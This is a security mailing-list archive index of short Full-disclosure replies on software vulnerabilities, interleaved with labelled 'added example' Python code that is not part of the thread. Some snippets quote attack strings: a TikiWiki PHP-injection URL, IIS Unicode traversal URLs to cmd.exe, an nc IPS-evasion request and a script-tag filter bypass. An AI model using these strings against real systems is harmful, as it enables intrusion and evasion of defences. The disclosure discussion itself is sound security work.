Re: [Full-disclosure] Microsoft Internet Information Server ftpd zeroday

2009-09-02 Thread Vladimir '3APA3A' Dubrovin
./A*/../A*/../A*/../A*/../A*/../A*/../A*/\r\n GL> At least on win2k3. Therefore, the workarounds for kb975191 on GL> microsoft.com are wrong. GL> Guido Landi GL> Vladimir '3APA3A' Dubrovin wrote: >> Dear Thierry Zoller, >> >> I think yes, MKDIR

Re: [Full-disclosure] Microsoft Internet Information Server ftpd zeroday

2009-08-31 Thread Vladimir '3APA3A' Dubrovin
Dear Thierry Zoller, I think yes, MKDIR is required. It should be a variation of S99-003/MS02-018. A fuzzer should be very smart to create a directory and use both an oversized buffer and ../ in NLST - it makes the path longer than MAX_PATH with an existing directory. --Monday, August 31, 20

Re: [Full-disclosure] Update: [TZO-06-2009] IBM Proventia - Generic bypass (Limited disclosure - see details)

2009-07-16 Thread Vladimir '3APA3A' Dubrovin
Thierry, I think the inability of antivirus / intrusion detection to catch something that is not malware/intrusion, or malware in a form unused in the wild, is not a vulnerability. Antivirus (generally) gives no preventive protection. They can add signatures for your PoCs to their database

Re: [Full-disclosure] radware AppWall Web Application Firewall: Source code disclosure on management interface

2009-07-03 Thread Vladimir '3APA3A' Dubrovin
Dear Shaked Vax, Are you sure the Radware team has analysed the reflected attack via the user's browser (AppWall administrator visits a malcrafted page, page redirects his request to AppWall) before excluding the remote vector? --Thursday, July 2, 2009, 3:23:16 PM, you wrote to full-disclosure@lists.gr

Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability

2009-06-16 Thread Vladimir '3APA3A' Dubrovin
ly by obfuscating a link sent to the >> s> "admin" of the device. this would obviously rely on the admin clicking on >> s> the link, and is more of a phishing / social engineering style attack. >> this >> s> would also rely on the router being setup with

Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability

2009-06-16 Thread Vladimir '3APA3A' Dubrovin
Dear Tom Neaves, It still can be exploited from the Internet even if "remote management" is only accessible from the local network. If you can trick a user into visiting a Web page, you can place a form on this page which targets the router, and the request to the router is issued from the victim's browser. --Tuesday

Re: [Full-disclosure] Addendum : [TZO-26-2009] Firefox (all?) Denial of Service through unclamped loop (SVG)

2009-05-27 Thread Vladimir '3APA3A' Dubrovin
Dear Jim Parkhurst, It may depend on the video card and video drivers and/or the amount of memory/video memory. 9 years ago there was a vulnerability in Internet Explorer with displaying a scaled image: http://securityvulns.com/advisories/ie5freeze.asp results

Re: [Full-disclosure] Windows Update (re-)installs outdated Flash ActiveX on Windows XP

2009-04-22 Thread Vladimir '3APA3A' Dubrovin
Dear Stefan Kanthak, As far as I can see, Internet Explorer actually uses flash10b.ocx. Adobe Flash Player 10.0 r22 --Monday, April 20, 2009, 8:17:24 PM, you wrote to bugt...@securityfocus.com: SK> Windows Update (as well as Microsoft Update and the Automatic Update) SK> installs an outdated (an

Re: [Full-disclosure] iDefense Security Advisory 10.30.08: Adobe PageMaker Key Strings Stack Buffer Overflow

2008-11-02 Thread Vladimir '3APA3A' Dubrovin
Dear iDefense Labs, --Thursday, October 30, 2008, 11:24:35 PM, you wrote to [EMAIL PROTECTED]: iL> VII. CVE INFORMATION iL> The Common Vulnerabilities and Exposures (CVE) project has assigned the iL> name CVE-2008-6432 to this issue. This is a candidate for inclusion in iL> the CVE list (http

Re: [Full-disclosure] Local persistent DoS in Windows XP SP2 Taskmanager

2008-03-15 Thread 3APA3A
Dear SkyOut, I see no security impact here. RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\PCHealth\\ErrorReporting", 0, KEY_SET_VALUE, &hKey); requires administrative privileges. If the user has them, you can achieve better results by deleting Task Manager or trojaning it. You can also

Re: [Full-disclosure] [FDSA] Multiple Vulnerabilities in Your Computer (all versions)

2008-01-15 Thread 3APA3A
Well, I can't say it's all fake... It's all junk. FD> OpenSSL 0.9.7j FD> openssl-0.9.7j/fips-1.0/aes/fips_aesavs.c 973: User supplied data FD> copied into fixed length buffer on the stack with no length FD> verification. Buffer overflow in non-suid test application (not compiled by default)

Re: [Full-disclosure] what is this?

2008-01-14 Thread 3APA3A
Dear Jose Nazario, JN> the file you sent here contains a bunch of embedded nulls (every other JN> character is 00). stripping those out reveals ... jose JN> nazario, ph.d. http://monkey.org/~jose/ This is Little Endian UCS-2 Unicode, not a bunch of embedded nulls.
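The decoding point in the reply above, as an added example that is not part of the thread or of anyone's posted code: a small sniffer that tells UTF-16LE (UCS-2LE) text apart from genuinely binary data, and shows why merely dropping the 0x00 bytes only works for text whose characters all sit in U+0001..U+00FF. It generalises the "every other byte is 00" observation to "the high byte of almost every 16-bit unit is the same value", which also catches non-Latin text such as Cyrillic. The sample byte strings are constructed here.

```python
"""Added example (not from the thread): UTF-16LE text versus "embedded nulls"."""
from collections import Counter

BOM_UTF16LE = b"\xff\xfe"


def strip_bom(data: bytes) -> bytes:
    return data[len(BOM_UTF16LE):] if data.startswith(BOM_UTF16LE) else data


def high_byte_dominance(data: bytes) -> float:
    """Fraction of 16-bit little-endian units sharing the most common high byte.
    Latin text gives 1.0 with high byte 0x00 (the 'every other byte is 00' pattern);
    text from one other script, e.g. Cyrillic, gives 1.0 with high byte 0x04;
    random binary gives a value near 1/units."""
    body = strip_bom(data)
    units = len(body) // 2
    if units == 0:
        return 0.0
    highs = Counter(body[1:2 * units:2])          # bytes at odd offsets are the high bytes in LE
    return max(highs.values()) / units


def looks_like_utf16le(data: bytes, threshold: float = 0.9) -> bool:
    """BOM FF FE, or an even length where almost every unit shares its high byte.
    Heuristic only: a long run of zero padding inside a binary also scores 1.0."""
    if data.startswith(BOM_UTF16LE):
        return True
    return len(data) % 2 == 0 and high_byte_dominance(data) >= threshold


def naive_strip_nulls(data: bytes) -> bytes:
    """The quick fix quoted in the thread: drop the zero bytes. Correct only for U+0001..U+00FF."""
    return data.replace(b"\x00", b"")


def decode_utf16le(data: bytes) -> str:
    """Proper decoding: drop the BOM if present and decode explicitly as little-endian."""
    return strip_bom(data).decode("utf-16-le")


def analyse(data: bytes) -> dict:
    """What a triage script would report for one blob."""
    text = looks_like_utf16le(data)
    return {
        "utf16le": text,
        "high_byte_dominance": round(high_byte_dominance(data), 3),
        "naive_strip": naive_strip_nulls(data) if text else None,
        "decoded": decode_utf16le(data) if text else None,
    }


# Constructed samples (not taken from the thread).
ASCII_SCRIPT = "<script>alert(1)</script>".encode("utf-16-le")   # the classic 'every other byte is 00'
CYRILLIC = "Привет".encode("utf-16-le")                           # high byte 0x04, no NULs at all
LATIN_WITH_BOM = BOM_UTF16LE + "Ünïcode".encode("utf-16-le")       # U+00DC, U+00EF live in the low byte
MACRON = "Ābcdefghijk".encode("utf-16-le")                         # U+0100 is 00 01: a NUL low byte
BINARY = bytes(range(0x10, 0x30))                                  # 16 units, every high byte differs

if __name__ == "__main__":
    for name, blob in [("ascii", ASCII_SCRIPT), ("cyrillic", CYRILLIC),
                       ("latin+bom", LATIN_WITH_BOM), ("macron", MACRON), ("binary", BINARY)]:
        print(name, analyse(blob))
```

Stripping nulls from CYRILLIC changes nothing (there are none) and leaves the bytes unreadable, while for MACRON it deletes half of the first character; decoding as UTF-16LE handles all five samples, and the BOM check plus the high-byte test keep the binary blob from being mistaken for text.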

Re: [Full-disclosure] what is this?

2008-01-14 Thread 3APA3A
Dear Nick FitzGerald, --Monday, January 14, 2008, 2:52:23 PM, you wrote to full-disclosure@lists.grok.org.uk: NF> U -- the only part of that likely to be relevant here is the last. NF> These kinds of web page "compromises" are typically achieved through NF> bad/ill-configured/non-updated

Re: [Full-disclosure] what is this?

2008-01-14 Thread 3APA3A
Dear crazy frog crazy frog, Clean the trojan off your computer, change the FTP password for your site hosting access, because it's stolen, access your hosting account via FTP and remove the additional text (usually at the end of the file, after ) from all HTML/PHP pages. --Sunday, January 13,

[Full-disclosure] securityvulns.com russian vulnerabilities digest

2008-01-03 Thread 3APA3A
n multiple persistent cross-site scriptings Original article: http://websecurity.com.ua/1596/ XSS in Math Comment Spam Protection < 2.2 Original article: http://websecurity.com.ua/1576/ XSS in Captcha! <= 2.5d Original article: http://websecurity.com.ua/1588/ -- http://securityvulns.com/

[Full-disclosure] multiple CAPTCHA automation test bypass digest

2008-01-03 Thread 3APA3A
to reCaptcha developers, the vulnerability is in Drupal code. Original article: http://websecurity.com.ua/1505/ Exploit: http://websecurity.com.ua/uploads/2007/MoBiC/reCaptcha.txt -- http://securityvulns.com/

Re: [Full-disclosure] HP Photosmart vulnerabilities

2007-12-28 Thread 3APA3A
Dear [EMAIL PROTECTED], SNMP is used to monitor printing queue status with the LPR or RAW printing protocol. This is a standard feature in e.g. Windows and is not HP-specific. You can find this option in the port settings. --Friday, December 28, 2007, 7:01:40 PM, you wrote to full-disclosure@lis

Re: [Full-disclosure] TCP Hijacking (aka Man-in-the-Middle)

2007-10-26 Thread 3APA3A
Dear [EMAIL PROTECTED], VKve> Thank you, Captain Obvious - I specifically *said* that only one of them VKve> needs to be blind spoofing. There is a difference between "you needn't" and "you can't" and "you won't". You say you needn't spoof another one. I say you won't and you can't. VKve>

Re: [Full-disclosure] TCP Hijacking (aka Man-in-the-Middle)

2007-10-26 Thread 3APA3A
Oct 2007 00:43:10 +0400, 3APA3A said: >> Randomized ISN doesn't protect against MitM. VKve> Doing a MitM is basically just spoofing two connections at the VKve> same time. If you know how to do one, you know how to do two. And VKve> if you know how to do one of them *

Re: [Full-disclosure] TCP Hijacking (aka Man-in-the-Middle)

2007-10-25 Thread 3APA3A
Valdis, you should go back to the Cretaceous period, because Oliver talks about a man-in-the-middle attack, not about blind TCP spoofing. Randomized ISN doesn't protect against MitM. --Thursday, October 25, 2007, 9:40:53 PM, you wrote to [EMAIL PROTECTED]: VKve> On Thu, 25 Oct 2007 10

[Full-disclosure] 3proxy 0.5.3j released (bugfix)

2007-10-23 Thread 3APA3A
cal network. -- http://securityvulns.com/ /\_/\ { , . } |\ +--oQQo->{ ^ }<-+ \ | ZARAZA U 3APA3A } You know my name - look up my number (The Beatles) +-o66o--+ / |/ ___ Full-Disclosure -

Re: [Full-disclosure] PDF mailto exploit in the wild

2007-10-23 Thread 3APA3A
Dear Paul Szabo, Messages like this that I've got are PDF spam without an attempt to exploit anything, and have been spammed since July. Not sure about this one though. --Tuesday, October 23, 2007, 4:18:52 PM, you wrote to full-disclosure@lists.grok.org.uk: PS> In case you are interested... messages l

Re: [Full-disclosure] CallManager and OpenSER toll fraud and authentication forward attack

2007-10-15 Thread 3APA3A
Dear Radu State, As far as I understood the issue, it requires an active Man-in-the-Middle attack. Digest authentication, like any authentication without traffic encryption or traffic signing, doesn't protect against an active M-i-t-M, because an active M-i-t-M can always force the client to

Re: [Full-disclosure] Microsoft Windows default ZIP handler bug

2007-10-15 Thread 3APA3A
Dear Kristian Erik Hermansen, Cannot reproduce it on patched Windows XP. Maybe it's the DynaZIP library buffer overflows fixed with MS04-34. --Monday, October 15, 2007, 12:19:31 PM, you wrote to full-disclosure@lists.grok.org.uk: KEH> I tested this on three Windows XP machines and was able to ma

Re: [Full-disclosure] Tikiwiki 1.9.8 exploit ITW

2007-10-12 Thread 3APA3A
Dear Moritz Naumann, This vulnerability was found by ShAnKaR http://securityvulns.ru/Sdocument162.html and reported on Bugtraq yesterday (see "Vulnerabilities digest" message). TikiWiki developers were informed on October 8. --Friday, October 12, 2007, 1:20:06 AM, you wrote to f

[Full-disclosure] Vulnerabilities digest

2007-10-10 Thread 3APA3A
: http://www.example.com/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title= Original message (in Russian): http://securityvulns.ru/Sdocument162.html Also, multiple vulnerabilities were reported in English by :: iNs @ uNkn0wn.eu

Re: [Full-disclosure] URI handling woes in Acrobat Reader, Netscape, Miranda, Skype

2007-10-08 Thread 3APA3A
Dear Thierry Zoller, --Saturday, October 6, 2007, 9:06:51 PM, you wrote to [EMAIL PROTECTED]: TZ> Dear Geo., G>> If the application is what exposes the URI handling routine to untrusted G>> code from the internet, TZ> Sorry, Untrusted code from the internet ? TZ> The user clicks on a mailto l

Re: [Full-disclosure] iDefense Security Advisory 10.02.07: Sun Microsystems Solaris FIFO FS Information Disclosure Vulnerability

2007-10-04 Thread 3APA3A
Dear iDefense Labs, --Wednesday, October 3, 2007, 6:32:03 PM, you wrote to [EMAIL PROTECTED]: iL> The vulnerability exists in the kernel ioctl() handler for FIFOs. The iL> I_PEEK ioctl is used to peek at a number of bytes contained in the FIFO iL> without actually removing them from the queue. O

Re: [Full-disclosure] Panda Antivirus 2008 Local Privilege Escalation (UPS they did it again)

2007-09-21 Thread 3APA3A
Dear Panda Security Response, [EMAIL PROTECTED] was contacted about this same vulnerability in Panda Antivirus 2007 on August 11, 2006 (more than a year ago) without any results or response, until information was published in Bugtraq. As far as I can see, pandasecurity.com is Swedish

Re: [Full-disclosure] [USN-515-1] t1lib vulnerability

2007-09-21 Thread 3APA3A
Dear Kees Cook, CVE-2007-4033 is "Buffer overflow in php_gd2.dll in the gd (PHP_GD2) extension in PHP 5.2.3 allows context-dependent attackers to execute arbitrary code via a long argument to the imagepsloadfont function." Please, provide valid CVE entry. --Thursday, September 20, 2007,

Re: [Full-disclosure] n.runs-SA-2007.027 - Sophos Antivirus UPX parsing Arbitrary CodeExecution Advisory

2007-08-27 Thread 3APA3A
Dear [EMAIL PROTECTED], Either the Subject "UPX parsing Arbitrary CodeExecution" or the vulnerability description "Infinite Loop in UPX packed files parsing" is wrong. Can you provide more detailed information please? It's not clear how an infinite loop can lead to remote code execution. --Fri

[Full-disclosure] Vulnerabilities digest

2007-08-21 Thread 3APA3A
re available from http://securityvulns.com/source13951.html -- http://securityvulns.com/

Re: [Full-disclosure] McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow

2007-08-16 Thread 3APA3A
Dear Joey Mengele, Of course, it's a mitigating factor. But: default PATH_MAX under Linux is 4096, and while it's not hard to create a file/folder with a longer path, it's impossible to access it. E.g. a folder with a path longer than PATH_MAX: bash$ pwd pwd: could not get current directory: get
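The PATH_MAX point above, carried through as an added example (not code from the thread): it builds a directory whose absolute path exceeds 4096 bytes using only relative mkdir/chdir, shows that relative access still works, and shows the kernel refusing the absolute name with ENAMETOOLONG. The segment length, depth and temp-dir prefix are the example's own choices. Whether getcwd() fails as in the quoted bash session depends on the libc (glibc walks the tree by ".." when the system call returns ENAMETOOLONG), so that result is reported but not relied on.

```python
"""Added example (not from the thread): a path longer than PATH_MAX can be created with
relative operations but cannot be reached by its absolute name."""
import errno
import os
import tempfile

SEGMENT = "d" * 100   # well under NAME_MAX (255), even on filesystems with tighter limits (assumption)
DEPTH = 45            # 45 * 101 bytes > 4096 before the temp-dir prefix is even counted


def path_max_demo(segment: str = SEGMENT, depth: int = DEPTH) -> dict:
    """Create segment/segment/... under a fresh temp dir one level at a time, probe it, clean up."""
    origin = os.open(".", os.O_RDONLY)            # fd to return to, whatever the cwd length becomes
    base = tempfile.mkdtemp(prefix="pathmax-")
    result = {"abs_len": 0, "relative_ok": False, "absolute_errno": None,
              "rejected_as_too_long": False, "getcwd": None}
    created = 0
    try:
        os.chdir(base)
        for _ in range(depth):
            os.mkdir(segment)                     # relative name: the kernel sees 100 bytes, not 4500
            os.chdir(segment)
            created += 1
        # From inside, relative access keeps working.
        result["relative_ok"] = os.path.isdir(".") and os.path.isdir(os.path.join("..", segment))
        # The full name is rejected before any lookup happens: getname() stops at PATH_MAX.
        absolute = os.path.join(base, *([segment] * depth))
        result["abs_len"] = len(absolute)
        try:
            os.stat(absolute)
        except OSError as exc:
            result["absolute_errno"] = exc.errno
            result["rejected_as_too_long"] = exc.errno == errno.ENAMETOOLONG
        # getcwd(): the system call fails with ENAMETOOLONG, but glibc falls back to walking '..',
        # so this may or may not fail depending on the libc. Reported, not asserted.
        try:
            result["getcwd"] = len(os.getcwd())
        except OSError as exc:
            result["getcwd"] = errno.errorcode.get(exc.errno, exc.errno)
    finally:
        # Unwind the way it was built; an rm -rf of the absolute path would hit the same limit.
        for _ in range(created):
            os.chdir("..")
            os.rmdir(segment)
        os.fchdir(origin)
        os.close(origin)
        os.rmdir(base)
    return result


def long_path_is_rejected() -> bool:
    """Single yes/no for the claim in the thread."""
    r = path_max_demo()
    return r["relative_ok"] and r["abs_len"] > 4096 and r["rejected_as_too_long"]


if __name__ == "__main__":
    print(path_max_demo())
```

The same asymmetry is what makes the scanner's fixed buffer hard to reach by ordinary means: a scanner that walks the tree with relative names will happily descend into the long path, while anything that reconstructs and opens the absolute name is stopped by the kernel first.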

Re: [Full-disclosure] [Beyond Security] New sudo off-by-one poc exploit.

2007-08-06 Thread 3APA3A
Dear Andrew Farmer, And this one is not even new: http://seclists.org/bugtraq/2005/Jul/0521.html --Monday, August 6, 2007, 2:40:57 PM, you wrote to [EMAIL PROTECTED]: AF> On 05 Aug 07, at 15:48, Beyond Security wrote: >> /* >> * off by one ebp overwrite in sudo prompt parsing function >> *

Re: [Full-disclosure] HORDE VULNERABILITIES

2007-08-03 Thread 3APA3A
Dear Mesut EREN, http://securityvulns.com/search/soft.asp?sofname=horde --Thursday, August 2, 2007, 10:09:31 AM, you wrote to full-disclosure@lists.grok.org.uk: ME> Hello everybody ME> The Horde Mail is any have Vulnerability?? ME> I use to Horde Mail i want to test my email system.. Than

[Full-disclosure] [AOGBF] Re: BS.Player 2.22 NULL ptr dereference

2007-08-03 Thread 3APA3A
Dear [EMAIL PROTECTED], Seems to be Another One George Bush Fan. You know, there is vulnerability in all media players, it can be exploited by opening MP3 file with George Bush bathroom singing. George Bush fans are not vulnerable, yet they are still vulnerable to one you described.

Re: [Full-disclosure] Cracking the entire set of DES-based crypt(3) hashes. Interested ?

2007-07-30 Thread 3APA3A
Dear coderman, Whhooo! We will not see SPAM any more, because all botnets will be overloaded with hash hacking! --Monday, July 30, 2007, 11:30:51 PM, you wrote to [EMAIL PROTECTED]: c> On 7/30/07, coderman <[EMAIL PROTECTED]> wrote: >> gotta pay off that copacobana? 10,000 hashes for brea

Re: [Full-disclosure] Cracking the entire set of DES-based crypt(3) hashes. Interested ?

2007-07-30 Thread 3APA3A
Dear Tremaine Lea, --Monday, July 30, 2007, 4:09:53 PM, you wrote to [EMAIL PROTECTED]: TL> -BEGIN PGP SIGNED MESSAGE- TL> Hash: SHA1 TL> $1-10/hash, and I'd actively seek/support an open source option. 5-10 days for full bruteforce? John-the-ripper on modern multi-core PC. -- ~/ZAR

Re: [Full-disclosure] Signal to Noise Ratio

2007-07-24 Thread 3APA3A
Dear [EMAIL PROTECTED], --Tuesday, July 24, 2007, 5:02:16 PM, you wrote to full-disclosure@lists.grok.org.uk: jkc> It seems to me the average SNR here could be greatly improved with any jkc> one of several commonly available "community-based" filtering jkc> mechanisms. Digg and Slashdot are b

Re: [Full-disclosure] PIRS2007 local buffer overflow vulnerability

2007-07-13 Thread 3APA3A
Dear [EMAIL PROTECTED], Please explain why this is a "vulnerability" and not "just a bug". --Friday, July 13, 2007, 5:26:17 PM, you wrote to full-disclosure@lists.grok.org.uk: esvnc> TeamIntell discovered local buffer overflow vulnerability esvnc> in PIRS2007 (data collection of companies and

Re: [Full-disclosure] TippingPoint IPS Signature Evasion

2007-07-11 Thread 3APA3A
Dear Paul Craig, --Wednesday, July 11, 2007, 1:37:03 AM, you wrote to [EMAIL PROTECTED]: PC> http://www.test.com/scripts%c0%afcmd.exe PC> http://www.test.com/scripts%e0%80%afcmd.exe PC> http://www.test.com/scripts%c1%9ccmd.exe PC> Web servers located behind a Tippingpoint IPS device which are c

[Full-disclosure] durito: enVivo!CMS SQL injection

2007-07-11 Thread 3APA3A
sage (in Russian): http://securityvulns.ru/Rdocument425.html -- http://securityvulns.com/

[Full-disclosure] Moodle XSS / Liesbeth base CMS sensitive information disclosure

2007-07-03 Thread 3APA3A

Re: [Full-disclosure] IPS Evasion with the Apache HTTP Server

2007-06-20 Thread 3APA3A
Dear Jamie Riden, --Wednesday, June 20, 2007, 4:39:21 PM, you wrote to [EMAIL PROTECTED]: JR> (This is what I gathered from the original posting, but I might be wrong.) JR> I think the issue is not that the apache server behaviour is wrong as JR> such, Original BreakingPoint articles author

Re: [Full-disclosure] IPS Evasion with the Apache HTTP Server

2007-06-20 Thread 3APA3A
Dear H D Moore, --Tuesday, June 19, 2007, 11:20:41 PM, you wrote to full-disclosure@lists.grok.org.uk: HDM> $ echo -ne "\r\n\r\n\r\n\r\n\r\n /buggy.php HTTP/1.0\r\n\r\n" | \ HDM> nc webserver 80 According to the recommendations of RFC 2616, section 4.1, a Web server or proxy server should ig
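The RFC 2616 section 4.1 point above, as an added example that is neither HDM's nor Apache's code: two request-line parsers, one that expects the Request-Line at byte 0 and one that first skips empty lines the way the RFC tells servers to, are fed the same bytes. The request is constructed here, modelled on the quoted nc one-liner but with an explicit GET method (an assumption), and the comparison shows the evasion: the tolerant server acts on a path the strict inspector never extracted.

```python
"""Added example (neither HDM's nor Apache's code): the parser differential created by
leading CRLFs in front of the Request-Line."""
import re

REQUEST_LINE = re.compile(rb"^([A-Z]+) (\S+) HTTP/(\d\.\d)$")


def parse_request_line_strict(raw: bytes):
    """An inspector that assumes the Request-Line is the first thing on the wire."""
    line, _, _ = raw.partition(b"\r\n")
    m = REQUEST_LINE.match(line)
    if m is None:
        return None
    return (m.group(1).decode(), m.group(2).decode(), m.group(3).decode())


def skip_leading_empty_lines(raw: bytes) -> bytes:
    """RFC 2616 section 4.1: a server SHOULD ignore any empty line(s) received where a
    Request-Line is expected. Bare LF is tolerated as well, in the spirit of section 19.3."""
    i = 0
    while raw[i:i + 2] == b"\r\n" or raw[i:i + 1] == b"\n":
        i += 2 if raw[i:i + 2] == b"\r\n" else 1
    return raw[i:]


def parse_request_line_rfc2616(raw: bytes):
    """What a compliant server does before it parses the Request-Line."""
    return parse_request_line_strict(skip_leading_empty_lines(raw))


def seen_path(raw: bytes, parser):
    """The request-target a component built on `parser` would act on, or None if it gives up."""
    parsed = parser(raw)
    return None if parsed is None else parsed[1]


def evades_inspection(raw: bytes) -> bool:
    """True when the server acts on a path the strict inspector never extracted,
    i.e. a signature keyed on the request path cannot fire."""
    return seen_path(raw, parse_request_line_strict) != seen_path(raw, parse_request_line_rfc2616)


# Constructed requests, modelled on the quoted nc one-liner but with an explicit GET method (assumption).
EVASION = b"\r\n\r\n\r\n\r\n\r\nGET /buggy.php HTTP/1.0\r\n\r\n"
PLAIN = b"GET /buggy.php HTTP/1.0\r\n\r\n"
BARE_LF = b"\n\nGET /buggy.php HTTP/1.0\r\n\r\n"

if __name__ == "__main__":
    for name, req in [("plain", PLAIN), ("leading CRLFs", EVASION), ("leading LFs", BARE_LF)]:
        print(name, "inspector:", seen_path(req, parse_request_line_strict),
              "server:", seen_path(req, parse_request_line_rfc2616),
              "evades:", evades_inspection(req))
```

The fix on the inspection side is not a new signature but the same normalisation the server applies: an IPS has to parse the stream the way the protected server will, leading empty lines included, or it is matching against a request the server never sees.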

[Full-disclosure] ShAnKaR: Simple Machines Forum CAPTCHA bypass and PHP injection

2007-06-18 Thread 3APA3A
forum message. (No further details are given by the advisory author.) -- http://securityvulns.com/

Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

2007-05-23 Thread 3APA3A
:35:17 PM, you wrote to [EMAIL PROTECTED]: k> Btw, k> Here is a screenshot of the effect. k> -Original Message- k> From: kingcope [mailto:[EMAIL PROTECTED] k> Sent: Wednesday, May 23, 2007 10:55 AM k> To: '3APA3A' k> Cc: 'Full-Disclosure'; '[EM

Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

2007-05-23 Thread 3APA3A
# method which checks the path (for example /AUX.aspx is blocked). k> Best Regards, k> Kingcope k> -----Original Message- k> From: 3APA3A [mailto:[EMAIL PROTECTED] k> Sent: Wednesday, May 23, 2007 10:41 AM k> To: kingcope k> Cc: Full-Disclosure; [EMAIL PROTECTED] k> Sub

Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

2007-05-23 Thread 3APA3A
Dear kingcope, It's a vulnerability regardless of the DoS impact, because it allows an attacker to access special DOS devices (COM1 in this case). E.g. it could be used to read data from a device attached to COM1 or prevent another application from accessing this port (or LPT), because access to ports is ex
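One check a server-side developer would want given the point above, as an added example that is not from the thread or from IIS: a validator that reports the reserved DOS device name (CON, PRN, AUX, NUL, COM1-9, LPT1-9, plus the superscript COM¹-³/LPT¹-³ variants) that a request path would map to, applying the Win32 rules that an extension, a trailing colon, and trailing spaces or dots do not change the name. It checks every path segment, which is conservative (a directory cannot carry such a name anyway), decodes the URL once before checking, and the sample paths are constructed.

```python
"""Added example (not from the thread): reserved DOS device names hiding in request paths."""
import re
from urllib.parse import unquote

DEVICES = {"CON", "PRN", "AUX", "NUL"}
DEVICES |= {f"COM{n}" for n in "123456789\u00b9\u00b2\u00b3"}
DEVICES |= {f"LPT{n}" for n in "123456789\u00b9\u00b2\u00b3"}


def device_name_of(segment: str):
    """Reserved device a single path component would resolve to, or None.
    Simplified model of Win32 name handling: trailing spaces and dots are dropped, the name is
    cut at the first '.' or ':', trailing spaces before the cut are dropped, and the comparison
    is case-insensitive. So COM1.aspx, 'com1 .txt', NUL: and prn.txt.bak are all devices."""
    name = segment.rstrip(" .")
    name = re.split(r"[.:]", name, maxsplit=1)[0].rstrip(" ").upper()
    return name if name in DEVICES else None


def reserved_device_in_path(url_path: str):
    """Decode once (as the web server will before touching the filesystem) and test every segment.
    Checking all segments rather than only the last is conservative: a directory cannot be
    named after a device, so no legitimate path is lost."""
    for segment in re.split(r"[\\/]+", unquote(url_path)):
        device = device_name_of(segment)
        if device is not None:
            return device
    return None


SAMPLES = [  # constructed, not from the thread
    "/AUX.aspx", "/COM1.aspx", "/scripts/com1%20.txt", "/nul:", "/prn.txt.bak",
    "/COM10.aspx", "/COMMA.aspx", "/default.aspx",
]

if __name__ == "__main__":
    for p in SAMPLES:
        print(f"{p:26} -> {reserved_device_in_path(p)}")
```

A blocklist that compares the whole filename against "AUX.aspx" style strings, as the thread describes, misses "COM1.aspx" and "com1 .txt" for exactly the reasons encoded in device_name_of: the device name is decided by the part before the first dot or colon, after Win32 has trimmed trailing spaces and dots, and never by the extension.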

[Full-disclosure] Unicode Left/Right Pointing Double Angle Quotation Mark bypass?

2007-05-22 Thread 3APA3A
%u00ABscript%u00BB in different environments to bypass filtering in this way? -- http://securityvulns.com/

Re: [Full-disclosure] noise about full-width encoding bypass?

2007-05-22 Thread 3APA3A
Dear Brian Eaton, --Monday, May 21, 2007, 11:28:27 PM, you wrote to [EMAIL PROTECTED]: BE> Given how few application platforms decode full-width unicode to ASCII BE> equivalents, is there a case to be made that those application BE> platforms that do decide this conversion is a good idea are bro

Re: [Full-disclosure] noise about full-width encoding bypass?

2007-05-22 Thread 3APA3A
Dear Brian Eaton, --Monday, May 21, 2007, 11:48:09 PM, you wrote to [EMAIL PROTECTED]: BE> On 5/21/07, 3APA3A <[EMAIL PROTECTED]> wrote: >> It's not true, because it's quite convertible character. At least for IIS: >> >> http://example.com/test.asp?q=%u

Re: [Full-disclosure] noise about full-width encoding bypass?

2007-05-21 Thread 3APA3A
Dear Brian Eaton, --Monday, May 21, 2007, 6:22:21 PM, you wrote to [EMAIL PROTECTED]: BE> If the SQL engine is processing queries in ASCII or ISO-8859-1, the BE> conversion from unicode to the code page used by the engine will fail. BE> Either the engine will give up on the query, or it might s

Re: [Full-disclosure] Retrieving "deleted" sms/mms from Nokia phone (Symbian S60)

2007-05-16 Thread 3APA3A
Dear Davide Del Vecchio, It's also possible to recover deleted photos from almost any flash card in almost any device (camera, mobile, etc) - it's the way general-purpose file systems work. The requirement to delete information securely is enforced in devices certified to e.g. process US mil

Re: [Full-disclosure] Medium security hole affecting DSL-G624T

2007-05-03 Thread 3APA3A
Dear Tim Brown, --Friday, May 4, 2007, 1:50:40 AM, you wrote to [EMAIL PROTECTED]: TB> On Thursday 03 May 2007 22:13:15 3APA3A wrote: >> This vulnerability for D-Link DSL-G624T was already reported by Jose >> Ramon Palanco. See >> >> http://securityvulns.

Re: [Full-disclosure] Medium security hole affecting DSL-G624T

2007-05-03 Thread 3APA3A
Dear Tim Brown, This vulnerability for D-Link DSL-G624T was already reported by Jose Ramon Palanco. See http://securityvulns.ru/Odocument816.html Previously, the same problem was reported for D-Link DSL-G604T by Qex http://securityvulns.ru/Mdocument578.html There were also a few more problems r

Re: [Full-disclosure] Firefox 2.0.0.3 Phishing Protection Bypass Vulnerability

2007-04-18 Thread 3APA3A
Dear carl hardwick, Do you know examples of phishing sites exploiting this vulnerability? --Wednesday, April 18, 2007, 1:47:03 PM, you wrote to full-disclosure@lists.grok.org.uk: ch> This flaw ch> http://kaneda.bohater.net/security/20070111-firefox_2.0.0.1_bypass_phishing_protection.php ch> r

Re: [Full-disclosure] Internet Explorer Crash

2007-04-17 Thread 3APA3A
Dear carl hardwick, Both Firefox 2.0.0.3 and IE 6.0.2900.2180 resisted (Firefox stops loading the page after 500MB of memory, IE warns about a script slowing down performance). It's a simple memory bomb; probably you are vulnerable because you have <= 512 MB of RAM. --Tuesday, April 17, 20

Re: [Full-disclosure] Mozilla Firefox Insecure Element Stealth Injection Vulnerability

2007-04-04 Thread 3APA3A
Dear Michal Majchrowicz, This feature is not intended to protect against XSS, it's only intended to inform you that some information is transmitted in cleartext. You can simply change src="http://server2.com/xss.js to src="https://server2.com/xss.js to avoid this message. --Wednesday, A

Re: [Full-disclosure] [VulnWatch] Microsoft Windows Vista Slideshow Unspecified Blue Screen Of Death Vulnerability

2007-03-30 Thread 3APA3A
